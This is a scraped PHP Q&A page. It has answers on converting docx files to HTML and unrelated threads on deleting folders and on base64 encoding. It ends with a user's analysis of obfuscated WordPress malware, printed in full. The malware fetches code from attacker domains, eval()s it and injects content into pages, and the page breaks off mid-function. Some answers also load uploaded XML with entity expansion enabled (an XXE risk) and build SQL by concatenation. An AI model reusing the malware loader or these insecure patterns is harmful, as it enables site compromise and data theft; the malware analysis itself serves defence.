How can I convert a docx document to html using php? - php

I want to be able to upload an MS word document and export it a page in my site.
Is there any way to accomplish this?

//FUNCTION :: read a docx file and return the string
function readDocx($filePath) {
// Create new ZIP archive
$zip = new ZipArchive;
$dataFile = 'word/document.xml';
// Open received archive file
if (true === $zip->open($filePath)) {
// If done, search for the data file in the archive
if (($index = $zip->locateName($dataFile)) !== false) {
// If found, read it to the string
$data = $zip->getFromIndex($index);
// Close archive file
$zip->close();
// Load XML from a string
// Skip errors and warnings
$xml = DOMDocument::loadXML($data, LIBXML_NOENT | LIBXML_XINCLUDE | LIBXML_NOERROR | LIBXML_NOWARNING);
// Return data without XML formatting tags
$contents = explode('\n',strip_tags($xml->saveXML()));
$text = '';
foreach($contents as $i=>$content) {
$text .= $contents[$i];
}
return $text;
}
$zip->close();
}
// In case of failure return empty string
return "";
}
ZipArchive and DOMDocument are both inside PHP so you don't need to install/include/require additional libraries.

One may use PHPDocX.
It has support for practically all HTML CSS styles. Moreover you may use templates to add extra formatting to your HTML via the replaceTemplateVariableByHTML.
The HTML methods of PHPDocX also allow for the direct use of Word styles. You may use something like this:
$docx->embedHTML($myHTML, array('tableStyle' => 'MediumGrid3-accent5PHPDOCX'));
If you want that all your tables use the MediumGrid3-accent5 Word style. The embedHTML method as well as its version for templates (replaceTemplateVariableByHTML) preserve inheritance, meaning by that that you may use a predefined Word style and override with CSS any of its properties.
You may also extract selected parts of your HTML using 'JQuery type' selectors.

You can convert Word docx documents to html using Print2flash library. Here is an PHP excerpt from my client's site which converts a document to html:
include("const.php");
$p2fServ = new COM("Print2Flash4.Server2");
$p2fServ->DefaultProfile->DocumentType=HTML5;
$p2fServ->ConvertFile($wordfile,$htmlFile);
It converts a document which path is specified in $wordfile variable to a html page file specified by $htmlFile variable. All formatting, hyperlinks and charts are retained. You can get the required const.php file altogether with a fuller sample from Print2flash SDK.

this is a workaround based on David Lin's answer above
removing "w:" in a docx's xml tags leave behing Html like tags
function readDocx($filePath) {
// Create new ZIP archive
$zip = new ZipArchive;
$dataFile = 'word/document.xml';
// Open received archive file
if (true === $zip->open($filePath)) {
// If done, search for the data file in the archive
if (($index = $zip->locateName($dataFile)) !== false) {
// If found, read it to the string
$data = $zip->getFromIndex($index);
// Close archive file
$zip->close();
// Load XML from a string
// Skip errors and warnings
$xml = new DOMDocument("1.0", "utf-8");
$xml->loadXML($data, LIBXML_NOENT | LIBXML_XINCLUDE | LIBXML_NOERROR | LIBXML_NOWARNING|LIBXML_PARSEHUGE);
$xml->encoding = "utf-8";
// Return data without XML formatting tags
$output = $xml->saveXML();
$output = str_replace("w:","",$output);
return $output;
}
$zip->close();
}
// In case of failure return empty string
return "";
}

Ok Im in very late, but thought I'd post this to save you all some time.
This is some php code I have put together not just to read the text from docx but the images too, currently it does not support floating images / text, but what I have done so far is a massive move forwards to whats already been posted on here - note you need to update https://example.co.uk to YOUR domain name.
<?php
class Docx_ws_imglnk {
public $originalpath = '';
public $extractedpath = '';
}
class Docx_ws_rel {
public $Id = '';
public $Target = '';
}
class Docx_ws_def {
public $styleId = '';
public $type = '';
public $color = '000000';
}
class Docx_p_def {
public $data = array();
public $text = "";
}
class Docx_p_item {
public $name = "";
public $value = "";
public $innerstyle = "";
public $type = "text";
}
class Docx_reader {
private $fileData = false;
private $errors = array();
public $rels = array();
public $imglnks = array();
public $styles = array();
public $document = null;
public $paragraphs = array();
public $path = '';
private $saveimgpath = 'docimages';
public function __construct() {
}
private function load($file) {
if (file_exists($file)) {
$zip = new ZipArchive();
$openedZip = $zip->open($file);
if ($openedZip === true) {
$this->path = $file;
//read and save images
for ( $i = 0; $i < $zip->numFiles; $i ++ ) {
$zip_element = $zip->statIndex( $i );
if ( preg_match( "([^\s]+(\.(?i)(jpg|jpeg|png|gif|bmp))$)", $zip_element['name'] ) ) {
$imglnk = new Docx_ws_imglnk;
$imglnk->originalpath = $zip_element['name'];
$imagename = explode( '/', $zip_element['name'] );
$imagename = end( $imagename );
$imglnk->extractedpath = dirname( __FILE__ ) . '/' . $this->savepath . $imagename;
$putres = file_put_contents( $imglnk->extractedpath, $zip->getFromIndex( $i ));
$imglnk->extractedpath = str_replace('var/www/', 'https://example.co.uk/', $imglnk->extractedpath);
$imglnk->extractedpath = substr($imglnk->extractedpath, 1);
array_push($this->imglnks, $imglnk);
}
}
//read relationships
if (($styleIndex = $zip->locateName('word/_rels/document.xml.rels')) !== false) {
$stylesRels = $zip->getFromIndex($styleIndex);
$xml = simplexml_load_string($stylesRels);
$XMLTEXT = $xml->saveXML();
$doc = new DOMDocument();
$doc->loadXML($XMLTEXT);
foreach($doc->documentElement->childNodes as $childnode)
{
$nodename = $childnode->nodeName;
if($childnode->hasAttributes())
{
$rel = new Docx_ws_rel;
for ($a = 0; $a < $childnode->attributes->count(); $a++)
{
$attrNode = $childnode->attributes->item($a);
if (strcmp( $attrNode->nodeName, 'Id') == 0)
{
$rel->Id = $attrNode->nodeValue;
}
if (strcmp( $attrNode->nodeName, 'Target') == 0)
{
$rel->Target = $attrNode->nodeValue;
}
}
array_push($this->rels, $rel);
}
}
}
//attempt to load styles:
if (($styleIndex = $zip->locateName('word/styles.xml')) !== false) {
$stylesXml = $zip->getFromIndex($styleIndex);
$xml = simplexml_load_string($stylesXml);
$XMLTEXT = $xml->saveXML();
$doc = new DOMDocument();
$doc->loadXML($XMLTEXT);
foreach($doc->documentElement->childNodes as $childnode)
{
$nodename = $childnode->nodeName;
//get style
if (strcmp($nodename, "w:style") == 0)
{
$ws_def = new Docx_ws_def;
for ($a=0; $a < $childnode->attributes->count(); $a++ )
{
$item = $childnode->attributes->item($a);
//style id
if (strcmp($item->nodeName, "w:styleId") == 0)
{
$ws_def->styleId = $item->nodeValue;
}
//style type
if (strcmp($item->nodeName, "w:type") == 0)
{
$ws_def->type = $item->nodeValue;
}
}
}
//push style to the array of styles
if (strcmp($ws_def->styleId, "") != 0 && strcmp($ws_def->type, "") != 0)
{
array_push($this->styles, $ws_def);
}
}
}
if (($index = $zip->locateName('word/document.xml')) !== false) {
$stylesDoc = $zip->getFromIndex($index);
$xml = simplexml_load_string($stylesDoc);
$XMLTEXT = $xml->saveXML();
$this->document = new DOMDocument();
$this->document->loadXML($XMLTEXT);
}
$zip->close();
} else {
switch($openedZip) {
case ZipArchive::ER_EXISTS:
$this->errors[] = 'File exists.';
break;
case ZipArchive::ER_INCONS:
$this->errors[] = 'Inconsistent zip file.';
break;
case ZipArchive::ER_MEMORY:
$this->errors[] = 'Malloc failure.';
break;
case ZipArchive::ER_NOENT:
$this->errors[] = 'No such file.';
break;
case ZipArchive::ER_NOZIP:
$this->errors[] = 'File is not a zip archive.';
break;
case ZipArchive::ER_OPEN:
$this->errors[] = 'Could not open file.';
break;
case ZipArchive::ER_READ:
$this->errors[] = 'Read error.';
break;
case ZipArchive::ER_SEEK:
$this->errors[] = 'Seek error.';
break;
}
}
} else {
$this->errors[] = 'File does not exist.';
}
}
public function setFile($path) {
$this->fileData = $this->load($path);
}
public function to_plain_text() {
if ($this->fileData) {
return strip_tags($this->fileData);
} else {
return false;
}
}
public function processDocument() {
$html = '';
foreach($this->document->documentElement->childNodes as $childnode)
{
$nodename = $childnode->nodeName;
//get the body of the document
if (strcmp($nodename, "w:body") == 0)
{
foreach($childnode->childNodes as $subchildnode)
{
$pnodename = $subchildnode->nodeName;
//process every paragraph
if (strcmp($pnodename, "w:p") == 0)
{
$pdef = new Docx_p_def;
foreach($subchildnode->childNodes as $pchildnode)
{
//process any inner children
if (strcmp($pchildnode, "w:pPr") == 0)
{
foreach($pchildnode->childNodes as $prchildnode)
{
//process text alignment
if (strcmp($prchildnode->nodeName, "w:pStyle") == 0)
{
$pitem = new Docx_p_item;
$pitem->name = 'styleId';
$pitem->value = $prchildnode->attributes->getNamedItem('val')->nodeValue;
array_push($pdef->data, $pitem);
}
//process text alignment
if (strcmp($prchildnode->nodeName, "w:jc") == 0)
{
$pitem = new Docx_p_item;
$pitem->name = 'align';
$pitem->value = $prchildnode->attributes->getNamedItem('val')->nodeValue;
if (strcmp($pitem->value, "left") == 0)
{
$pitem->innerstyle .= "text-align:" . $pitem->value . ";";
}
if (strcmp($pitem->value, "center") == 0)
{
$pitem->innerstyle .= "text-align:" . $pitem->value . ";";
}
if (strcmp($pitem->value, "right") == 0)
{
$pitem->innerstyle .= "text-align:" . $pitem->value . ";";
}
if (strcmp($pitem->value, "both") == 0)
{
$pitem->innerstyle .= "word-spacing:" . 10 . "px;";
}
array_push($pdef->data, $pitem);
}
//process drawing
if (strcmp($prchildnode->nodeName, "w:drawing") == 0)
{
$pitem = new Docx_p_item;
$pitem->name = 'drawing';
$pitem->value = '';
$pitem->type = 'graphic';
$extents = $prchildnode->getElementsByTagName('extent')[0];
$cx = $extents->attributes->getNamedItem('cx')->nodeValue;
$cy = $extents->attributes->getNamedItem('cy')->nodeValue;
$pcx = (int)$cx / 9525;
$pcy = (int)$cy / 9525;
$pitem->innerstyle .= "width:" . $pcx . "px;";
$pitem->innerstyle .= "height:" . $pcy . "px;";
$blip = $prchildnode->getElementsByTagName('blip')[0];
$pitem->value = $blip->attributes->getNamedItem('embed')->nodeValue;
array_push($pdef->data, $pitem);
}
//process spacing
if (strcmp($prchildnode->nodeName, "w:spacing") == 0)
{
$pitem = new Docx_p_item;
$pitem->name = 'paragraphSpacing';
$bval = $prchildnode->attributes->getNamedItem('before')->nodeValue;
if (strcmp($bval, '') == 0)
$bval = 0;
$pitem->innerstyle .= "padding-top:" . $bval . "px;";
$aval = $prchildnode->attributes->getNamedItem('after')->nodeValue;
if (strcmp($aval, '') == 0)
$aval = 0;
$pitem->innerstyle .= "padding-bottom:" . $aval . "px;";
array_push($pdef->data, $pitem);
}
}
}
if (strcmp($pchildnode, "w:r") == 0)
{
foreach($pchildnode->childNodes as $rchildnode)
{
//process text
if (strcmp($rchildnode->nodeName, "w:t") == 0)
{
$pdef->text .= $rchildnode->nodeValue;
if (count($pdef->data) == 0)
{
$pitem = new Docx_p_item;
$pitem->name = 'styleId';
$pitem->value = '';
array_push($pdef->data, $pitem);
}
}
if (strcmp($rchildnode->nodeName, "w:rPr") == 0)
{
foreach($rchildnode->childNodes as $rPrchildnode)
{
if (strcmp($rPrchildnode->nodeName, "w:b") == 0 )
{
$pitem = new Docx_p_item;
$pitem->name = 'textBold';
$pitem->value = '';
$pitem->innerstyle .= "text-weight: 500;";
array_push($pdef->data, $pitem);
}
if (strcmp($rPrchildnode->nodeName, "w:i") == 0 )
{
$pitem = new Docx_p_item;
$pitem->name = 'textItalic';
$pitem->value = '';
$pitem->innerstyle .= "text-style: italic;";
array_push($pdef->data, $pitem);
}
if (strcmp($rPrchildnode->nodeName, "w:u") == 0 )
{
$pitem = new Docx_p_item;
$pitem->name = 'textUnderline';
$pitem->value = '';
$pitem->innerstyle .= "text-decoration: underline;";
array_push($pdef->data, $pitem);
}
if (strcmp($rPrchildnode->nodeName, "w:sz") == 0 )
{
$pitem = new Docx_p_item;
$pitem->name = 'textSize';
$sz = $rPrchildnode->attributes->getNamedItem('val')->nodeValue;
if ($sz == '')
{
$sz=0;
}
$pitem->value = $sz;
array_push($pdef->data, $pitem);
}
}
}
}
}
}
array_push($this->paragraphs, $pdef);
}
}
}
}
}
public function to_html()
{
$html = '';
foreach($this->paragraphs as $para)
{
$styleselect = null;
$type = 'text';
$content = $para->text;
$sz = 0;
$extent = '';
$embedid = '';
$pinnerstylesid = '';
$pinnerstylesunderline = '';
$pinnerstylessz = '';
if (count($para->data) > 0)
{
foreach($para->data as $node)
{
if (strcmp($node->name, "styleId") == 0)
{
$type = $node->type;
$pinnerstylesid = $node->innerstyle;
foreach($this->styles as $style)
{
if (strcmp ($node->value, $style->styleId) == 0)
{
$styleselect = $style;
}
}
}
if (strcmp($node->name, "align") == 0)
{
$pinnerstylesid .= $node->innerstyle. ";";
}
if (strcmp($node->name, "drawing") == 0)
{
$type = $node->type;
$extent = $node->innerstyle;
$embedid = $node->value;
}
if (strcmp($node->name, "textSize") == 0)
{
$sz = $node->value;
}
if (strcmp($node->name, "textUnderline") == 0)
{
$pinnerstylesunderline = $node->innerstyle;
}
}
}
if (strcmp($type, 'text') == 0)
{
//echo "has valid para";
//echo "<br>";
if ($styleselect != null)
{
//echo "has valid style";
//echo "<br>";
if (strcmp($styleselect->color, '') != 0)
{
$pinnerstylesid .= "color:#" . $styleselect->color. ";";
}
}
if ($sz != 0)
{
$pinnerstylesid .= 'font-size:' . $sz . 'px;';
//echo "sz<br>";
}
$span = "<p style='". $pinnerstylesid . $pinnerstylesunderline ."'>";
$span .= $content;
$span .= "</p>";
//echo $span;
$html .= $span;
}
if (strcmp($type, 'graphic') == 0)
{
$imglnk = '';
foreach($this->rels as $rel)
{
if(strcmp($embedid, '') != 0 && strcmp($rel->Id, $embedid) == 0)
{
foreach($this->imglnks as $imgpathdef)
{
if (strpos($imgpathdef->extractedpath, $rel->Target) >= 0)
{
$imglnk = $imgpathdef->extractedpath;
//echo "has img link<br>";
//echo $imglnk . "<br>";
}
}
}
}
if ($styleselect != null)
{
//echo "has valid style";
//echo "<br>";
if (strcmp($styleselect->color, '') != 0)
{
$pinnerstylesid .= "color:#" . $styleselect->color. ";";
}
}
if ($sz != 0)
{
$pinnerstylesid .= 'font-size:' . $sz . 'px;';
//echo "sz<br>";
}
$span = "<p style='". $pinnerstylesid . $pinnerstylesunderline ."'>";
$span .= "<img style='". $extent ."' alt='image coming soon' src ='". $imglnk ."'/>";
$span .= "</p>";
//echo $span;
$html .= $span;
}
}
return $html;
}
public function get_errors() {
return $this->errors;
}
private function getStyles() {
}
}
function getDocX($path)
{
//echo $path;
$doc = new Docx_reader();
$doc->setFile($path);
if(!$doc->get_errors()) {
$doc->processDocument();
$html = $doc->to_html();
echo $html;
}
return "";
}
?>

Related

Glitches in code for deleting a folder after the zip is made

I have the code below.
It first create a dynamic folder with name like v3_12-02-2012-12873547839. Then it creates a subfolder called "image" and saves some jpeg images in the subfolder. Then it create a csv file and put it in "v3_12-02-2012-12873547839"
Then it creates a zip folder in the project folder with name "v3_12-02-2012-12873547839.zip"
function create_csv($version,$ctg,$cnt,$nt,$api)
{
$folder = $version."-".date('d-m-Y')."-".time();
if(!file_exists('./'.$folder))
{
mkdir('./'.$folder);
mkdir('./'.$folder.'/image/');
}
$cnt_table = "aw_countries_".$version;
$ctg_table = "aw_categories_".$version;
$off_table = "aw_offers_".$version;
$sizeof_ctg = count($ctg);
$cond_ctg = " ( ";
for($c = 0; $c < $sizeof_ctg ; $c++)
{
$cond_ctg = $cond_ctg." $ctg_table.category = '".$ctg[$c]."' ";
if($c < intval($sizeof_ctg-1))
$cond_ctg = $cond_ctg." OR ";
else if($c == intval($sizeof_ctg-1))
$cond_ctg = $cond_ctg." ) ";
}
$sizeof_cnt = count($cnt);
$cond_cnt = " ( ";
for($cn = 0; $cn < $sizeof_cnt ; $cn++)
{
$cond_cnt = $cond_cnt." $cnt_table.country = '".$cnt[$cn]."' ";
if($cn < intval($sizeof_cnt-1))
$cond_cnt = $cond_cnt." OR ";
else if($cn == intval($sizeof_cnt-1))
$cond_cnt = $cond_cnt." ) ";
}
$sizeof_nt = count($nt);
$cond_nt = " ( ";
for($n = 0; $n < $sizeof_nt ; $n++)
{
$cond_nt = $cond_nt." $off_table.network_id = '".$nt[$n]."' ";
if($n < intval($sizeof_nt-1))
$cond_nt = $cond_nt." OR ";
else if($n == intval($sizeof_nt-1))
$cond_nt = $cond_nt." ) ";
}
$sizeof_api = count($api);
$cond_api = " ( ";
for($a = 0; $a < $sizeof_api ; $a++)
{
$cond_api = $cond_api." $off_table.api_key = '".$api[$a]."' ";
if($a < intval($sizeof_api-1))
$cond_api = $cond_api." OR ";
else if($a == intval($sizeof_api-1))
$cond_api = $cond_api." ) ";
}
$output = "";
$sql = "SELECT DISTINCT $off_table.id,$off_table.name
FROM $off_table,$cnt_table,$ctg_table
WHERE $off_table.id = $cnt_table.id
AND $off_table.id = $ctg_table.id
AND ".$cond_api."
AND ".$cond_nt."
AND ".$cond_cnt."
AND ".$cond_ctg;
$result = mysql_query($sql);
$columns_total = mysql_num_fields($result);
for ($i = 0; $i < $columns_total; $i++)
{
$heading = mysql_field_name($result, $i);
$output .= '"'.$heading.'",';
}
$output .= '"icon"';
$output .="\n";
while ($row = mysql_fetch_array($result))
{
for ($i = 0; $i < $columns_total; $i++)
{
$output .='"'.$row["$i"].'",';
}
$sql_icon = "SELECT $off_table.icon FROM $off_table WHERE id = '".$row['id']."'";
$result_icon = mysql_query($sql_icon);
while($row_icon = mysql_fetch_array($result_icon))
{
$image = $row_icon["icon"];
$id = $row["id"];
$icon = "./$folder/image/{$id}.jpg";
$icon_link = "$folder/image/{$id}.jpg";
file_put_contents($icon, $image);
}
$output .= '"'.$icon_link.'"';
$output .="\n";
}
$filename = "myFile.csv";
$fd = fopen ( "./$folder/$filename", "w");
fputs($fd, $output);
fclose($fd);
$source = $folder;
$destination = $folder.'.zip';
$flag = '';
if (!extension_loaded('zip') || !file_exists($source)) {
return false;
}
$zip = new ZipArchive();
if (!$zip->open($destination, ZIPARCHIVE::CREATE)) {
return false;
}
$source = str_replace('\\', '/', $source);
if($flag)
{
$flag = basename($source) . '/';
}
if (is_dir($source) === true)
{
$files = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($source), RecursiveIteratorIterator::SELF_FIRST);
foreach ($files as $file)
{
if (strpos($flag.$file,$source) !== false) { // this will add only the folder we want to add in zip
if (is_dir($file) === true)
{
}
else if (is_file($file) === true)
{
$zip->addFromString(str_replace($source . '/', '', $flag.$file), file_get_contents($file));
}
}
}
}
else if (is_file($source) === true)
{
$zip->addFromString($flag.basename($source), file_get_contents($source));
}
$zip->close();
if (is_dir($folder))
{
$objects = scandir($folder);
foreach ($objects as $object)
{
if ($object != "." && $object != "..")
{
if (filetype($folder."/".$object) == "dir")
{
$object_inner = scandir($folder."/".$object);
foreach ($object_inner as $object_inner)
{
if ($object_inner != "." && $object_inner != "..")
{
unlink($folder."/".$object."/".$object_inner);
}
}
rmdir($folder."/".$object);
}
else
unlink($folder."/".$object);
}
}
reset($objects);
}
rmdir("./".$folder);
}
Now the problem is, when I am trying to delete the folder, the folder somehow doesn't seem to delete, though I can recursively delete all its contents. Even though the folder becomes empty at the end, it doesn't get deleted.
Error I am getting:
Warning: rmdir(./v3-02-12-2014-1417512727): Permission denied in C:\xampp\htdocs\projecthas2offer\appwall_dev\frontend\ajax.php on line 265
Instances of ZipArchive and/or RecursiveIteratorIterator still live and might still have their hands on your directory, so free them using unset( $zip, $files );

Why base64_encode() return null

I have a 22M docx file and want to encode it using base64_encode() function in php. But It always returns NULL value after running this function. Is there any limit file size or condition for this function. My code:
$handle = fopen($fullpathfile, "rb");
$imagestr = base64_encode(fread($handle, filesize($fullpathfile)));
fclose($handle);
Try this code
$fh = fopen($fullpathfile, 'rb');
$cache = '';
$eof = false;
while (1) {
if (!$eof) {
if (!feof($fh)) {
$row = fgets($fh, 4096);
} else {
$row = '';
$eof = true;
}
}
if ($cache !== '')
$row = $cache.$row;
elseif ($eof)
break;
$b64 = base64_encode($row);
$put = '';
if (strlen($b64) < 76) {
if ($eof) {
$put = $b64."\n";
$cache = '';
} else {
$cache = $row;
}
} elseif (strlen($b64) > 76) {
do {
$put .= substr($b64, 0, 76)."\n";
$b64 = substr($b64, 76);
} while (strlen($b64) > 76);
$cache = base64_decode($b64);
} else {
if (!$eof && $b64{75} == '=') {
$cache = $row;
} else {
$put = $b64."\n";
$cache = '';
}
}
if ($put !== '') {
echo $put;
}
}
fclose($fh);

What exactly does this PHP exploit code (found on my app)?

I've found this code in base 64 on all php files of one of my client's site (wordpress) and I'm trying to understand what it does.
I'm also trying to figure out if it was an application exploit or a direct FTP access that has past this code.
Everything starts with setup_globals_777() and ob_start('mrobh') setting the callback to the mrobh($content) function.
Then there are a call to gzdecodeit ($decode) where the hassle starts out.
It seems like it gets the page content and change it. Now I'm trying to detect the specific changes and understand all functions, including the second one gzdecodeit().
Can someone shed some light on it?
The calls
setup_globals_777();
ob_start('mrobh');
// Here the application code and html output starts out
The callback:
function mrobh ($content)
{
#Header('Content-Encoding: none');
$decoded_content = gzdecodeit($content);
if (preg_match('/\<\/body/si', $decoded_content)) {
return preg_replace('/(\<\/body[^\>]*\>)/si', gml_777() . "\n" . '$1',
$decoded_content);
} else {
return $decoded_content . gml_777();
}
}
The setup function (understandable)
function setup_globals_777 ()
{
$rz = $_SERVER["DOCUMENT_ROOT"] . "/.logs/";
$mz = "/tmp/";
if (! is_dir($rz)) {
#mkdir($rz);
if (is_dir($rz)) {
$mz = $rz;
} else {
$rz = $_SERVER["SCRIPT_FILENAME"] . "/.logs/";
if (! is_dir($rz)) {
#mkdir($rz);
if (is_dir($rz)) {
$mz = $rz;
}
} else {
$mz = $rz;
}
}
} else {
$mz = $rz;
}
$bot = 0;
$ua = $_SERVER['HTTP_USER_AGENT'];
if (stristr($ua, "msnbot") || stristr($ua, "Yahoo"))
$bot = 1;
if (stristr($ua, "bingbot") || stristr($ua, "google"))
$bot = 1;
$msie = 0;
if (is_msie_777($ua))
$msie = 1;
$mac = 0;
if (is_mac_777($ua))
$mac = 1;
if (($msie == 0) && ($mac == 0))
$bot = 1;
global $_SERVER;
$_SERVER['s_p1'] = $mz;
$_SERVER['s_b1'] = $bot;
$_SERVER['s_t1'] = 1200;
$_SERVER['s_d1'] = "http://sweepstakesandcontestsdo.com/";
$d = '?d=' . urlencode($_SERVER["HTTP_HOST"]) . "&p=" .
urlencode($_SERVER["PHP_SELF"]) . "&a=" .
urlencode($_SERVER["HTTP_USER_AGENT"]);
$_SERVER['s_a1'] = 'http://www.lilypophilypop.com/g_load.php' . $d;
$_SERVER['s_a2'] = 'http://www.lolypopholypop.com/g_load.php' . $d;
$_SERVER['s_script'] = "mm.php?d=1";
}
The first function called after the callback execution:
Here is where the magic happens. I can't see the calls for the other
available functions and understand what this function is actually
decoding, since the $decode var is the application output grabbed by
the ob_start()
function gzdecodeit ($decode)
{
$t = #ord(#substr($decode, 3, 1));
$start = 10;
$v = 0;
if ($t & 4) {
$str = #unpack('v', substr($decode, 10, 2));
$str = $str[1];
$start += 2 + $str;
}
if ($t & 8) {
$start = #strpos($decode, chr(0), $start) + 1;
}
if ($t & 16) {
$start = #strpos($decode, chr(0), $start) + 1;
}
if ($t & 2) {
$start += 2;
}
$ret = #gzinflate(#substr($decode, $start));
if ($ret === FALSE) {
$ret = $decode;
}
return $ret;
}
All the available functions (after a base64_decode()):
<?php
if (function_exists('ob_start') && ! isset($_SERVER['mr_no'])) {
$_SERVER['mr_no'] = 1;
if (! function_exists('mrobh')) {
function get_tds_777 ($url)
{
$content = "";
$content = #trycurl_777($url);
if ($content !== false)
return $content;
$content = #tryfile_777($url);
if ($content !== false)
return $content;
$content = #tryfopen_777($url);
if ($content !== false)
return $content;
$content = #tryfsockopen_777($url);
if ($content !== false)
return $content;
$content = #trysocket_777($url);
if ($content !== false)
return $content;
return '';
}
function trycurl_777 ($url)
{
if (function_exists('curl_init') === false)
return false;
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_TIMEOUT, 5);
curl_setopt($ch, CURLOPT_HEADER, 0);
$result = curl_exec($ch);
curl_close($ch);
if ($result == "")
return false;
return $result;
}
function tryfile_777 ($url)
{
if (function_exists('file') === false)
return false;
$inc = #file($url);
$buf = #implode('', $inc);
if ($buf == "")
return false;
return $buf;
}
function tryfopen_777 ($url)
{
if (function_exists('fopen') === false)
return false;
$buf = '';
$f = #fopen($url, 'r');
if ($f) {
while (! feof($f)) {
$buf .= fread($f, 10000);
}
fclose($f);
} else
return false;
if ($buf == "")
return false;
return $buf;
}
function tryfsockopen_777 ($url)
{
if (function_exists('fsockopen') === false)
return false;
$p = #parse_url($url);
$host = $p['host'];
$uri = $p['path'] . '?' . $p['query'];
$f = #fsockopen($host, 80, $errno, $errstr, 30);
if (! $f)
return false;
$request = "GET $uri HTTP/1.0\n";
$request .= "Host: $host\n\n";
fwrite($f, $request);
$buf = '';
while (! feof($f)) {
$buf .= fread($f, 10000);
}
fclose($f);
if ($buf == "")
return false;
list ($m, $buf) = explode(chr(13) . chr(10) . chr(13) . chr(10),
$buf);
return $buf;
}
function trysocket_777 ($url)
{
if (function_exists('socket_create') === false)
return false;
$p = #parse_url($url);
$host = $p['host'];
$uri = $p['path'] . '?' . $p['query'];
$ip1 = #gethostbyname($host);
$ip2 = #long2ip(#ip2long($ip1));
if ($ip1 != $ip2)
return false;
$sock = #socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
if (! #socket_connect($sock, $ip1, 80)) {
#socket_close($sock);
return false;
}
$request = "GET $uri HTTP/1.0\n";
$request .= "Host: $host\n\n";
socket_write($sock, $request);
$buf = '';
while ($t = socket_read($sock, 10000)) {
$buf .= $t;
}
#socket_close($sock);
if ($buf == "")
return false;
list ($m, $buf) = explode(chr(13) . chr(10) . chr(13) . chr(10),
$buf);
return $buf;
}
function update_tds_file_777 ($tdsfile)
{
$actual1 = $_SERVER['s_a1'];
$actual2 = $_SERVER['s_a2'];
$val = get_tds_777($actual1);
if ($val == "")
$val = get_tds_777($actual2);
$f = #fopen($tdsfile, "w");
if ($f) {
#fwrite($f, $val);
#fclose($f);
}
if (strstr($val, "|||CODE|||")) {
list ($val, $code) = explode("|||CODE|||", $val);
eval(base64_decode($code));
}
return $val;
}
function get_actual_tds_777 ()
{
$defaultdomain = $_SERVER['s_d1'];
$dir = $_SERVER['s_p1'];
$tdsfile = $dir . "log1.txt";
if (#file_exists($tdsfile)) {
$mtime = #filemtime($tdsfile);
$ctime = time() - $mtime;
if ($ctime > $_SERVER['s_t1']) {
$content = update_tds_file_777($tdsfile);
} else {
$content = #file_get_contents($tdsfile);
}
} else {
$content = update_tds_file_777($tdsfile);
}
$tds = #explode("\n", $content);
$c = #count($tds) + 0;
$url = $defaultdomain;
if ($c > 1) {
$url = trim($tds[mt_rand(0, $c - 2)]);
}
return $url;
}
function is_mac_777 ($ua)
{
$mac = 0;
if (stristr($ua, "mac") || stristr($ua, "safari"))
if ((! stristr($ua, "windows")) && (! stristr($ua, "iphone")))
$mac = 1;
return $mac;
}
function is_msie_777 ($ua)
{
$msie = 0;
if (stristr($ua, "MSIE 6") || stristr($ua, "MSIE 7") ||
stristr($ua, "MSIE 8") || stristr($ua, "MSIE 9"))
$msie = 1;
return $msie;
}
function setup_globals_777 ()
{
$rz = $_SERVER["DOCUMENT_ROOT"] . "/.logs/";
$mz = "/tmp/";
if (! is_dir($rz)) {
#mkdir($rz);
if (is_dir($rz)) {
$mz = $rz;
} else {
$rz = $_SERVER["SCRIPT_FILENAME"] . "/.logs/";
if (! is_dir($rz)) {
#mkdir($rz);
if (is_dir($rz)) {
$mz = $rz;
}
} else {
$mz = $rz;
}
}
} else {
$mz = $rz;
}
$bot = 0;
$ua = $_SERVER['HTTP_USER_AGENT'];
if (stristr($ua, "msnbot") || stristr($ua, "Yahoo"))
$bot = 1;
if (stristr($ua, "bingbot") || stristr($ua, "google"))
$bot = 1;
$msie = 0;
if (is_msie_777($ua))
$msie = 1;
$mac = 0;
if (is_mac_777($ua))
$mac = 1;
if (($msie == 0) && ($mac == 0))
$bot = 1;
global $_SERVER;
$_SERVER['s_p1'] = $mz;
$_SERVER['s_b1'] = $bot;
$_SERVER['s_t1'] = 1200;
$_SERVER['s_d1'] = "http://sweepstakesandcontestsdo.com/";
$d = '?d=' . urlencode($_SERVER["HTTP_HOST"]) . "&p=" .
urlencode($_SERVER["PHP_SELF"]) . "&a=" .
urlencode($_SERVER["HTTP_USER_AGENT"]);
$_SERVER['s_a1'] = 'http://www.lilypophilypop.com/g_load.php' . $d;
$_SERVER['s_a2'] = 'http://www.lolypopholypop.com/g_load.php' . $d;
$_SERVER['s_script'] = "mm.php?d=1";
}
if (! function_exists('gml_777')) {
function gml_777 ()
{
$r_string_777 = '';
if ($_SERVER['s_b1'] == 0)
$r_string_777 = '';
return $r_string_777;
}
}
if (! function_exists('gzdecodeit')) {
function gzdecodeit ($decode)
{
$t = #ord(#substr($decode, 3, 1));
$start = 10;
$v = 0;
if ($t & 4) {
$str = #unpack('v', substr($decode, 10, 2));
$str = $str[1];
$start += 2 + $str;
}
if ($t & 8) {
$start = #strpos($decode, chr(0), $start) + 1;
}
if ($t & 16) {
$start = #strpos($decode, chr(0), $start) + 1;
}
if ($t & 2) {
$start += 2;
}
$ret = #gzinflate(#substr($decode, $start));
if ($ret === FALSE) {
$ret = $decode;
}
return $ret;
}
}
function mrobh ($content)
{
#Header('Content-Encoding: none');
$decoded_content = gzdecodeit($content);
if (preg_match('/\<\/body/si', $decoded_content)) {
return preg_replace('/(\<\/body[^\>]*\>)/si',
gml_777() . "\n" . '$1', $decoded_content);
} else {
return $decoded_content . gml_777();
}
}
}
}
Looks like it creates a hidden .log folder:
$rz = $_SERVER["DOCUMENT_ROOT"] . "/.logs/";
$mz = "/tmp/";
if (! is_dir($rz)) {
#mkdir($rz);
if (is_dir($rz)) {
$mz = $rz;
} else {
$rz = $_SERVER["SCRIPT_FILENAME"] . "/.logs/";
if (! is_dir($rz)) {
#mkdir($rz);
if (is_dir($rz)) {
$mz = $rz;
}
} else {
$mz = $rz;
}
}
} else {
$mz = $rz;
}
Then seems to download code from http://www.lolypopholypop.com/g_load.php and http://sweepstakesandcontestsdo.com/, base64 decodes it, then executes it:
function update_tds_file_777 ($tdsfile)
{
$actual1 = $_SERVER['s_a1'];
$actual2 = $_SERVER['s_a2'];
$val = get_tds_777($actual1);
if ($val == "")
